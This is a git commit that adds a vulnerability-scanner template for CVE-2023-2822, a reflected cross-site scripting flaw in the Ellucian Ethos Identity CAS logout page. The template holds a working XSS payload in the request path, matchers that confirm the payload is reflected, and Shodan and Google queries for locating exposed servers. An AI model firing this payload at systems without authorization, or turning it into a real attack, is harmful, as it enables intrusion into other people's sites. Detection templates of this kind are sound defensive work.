Merge pull request #7616 from projectdiscovery/CVE-2023-2822

Create CVE-2023-2822.yaml
2023-07-07 15:04:52 +05:30 · 2023-07-07 15:04:52 +05:30 · a8503c567d
parent 83ddc0d98e 2a2c309d6c
commit a8503c567d
1 changed files with 42 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-2822.yaml
+++ b/http/cves/2023/CVE-2023-2822.yaml
@ -0,0 +1,42 @@
+id: CVE-2023-2822
+
+info:
+  name: Ellucian Ethos Identity CAS - Cross-Site Scripting
+  author: Guax1
+  severity: medium
+  description: |
+    A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
+  remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component.
+  reference:
+    - https://medium.com/@cyberninja717/685bb1675dfb
+    - https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb
+    - https://vuldb.com/?ctiid.229596
+    - https://vuldb.com/?id.229596
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-2822
+    cwe-id: CWE-79
+  metadata:
+    max-request: 1
+    shodan-query: html:"Ellucian Company"
+    google-query: "login with ellucian ethos identity"
+  tags: cve,cve2023,cas,xss,ellucian
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cas/logout?url=https://oast.pro"><img%20src=x%20onerror=alert(document.domain)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src=x onerror=alert(document.domain)>'
+          - 'Identity Server'
+        condition: and
+
+      - type: status
+        status:
+          - 200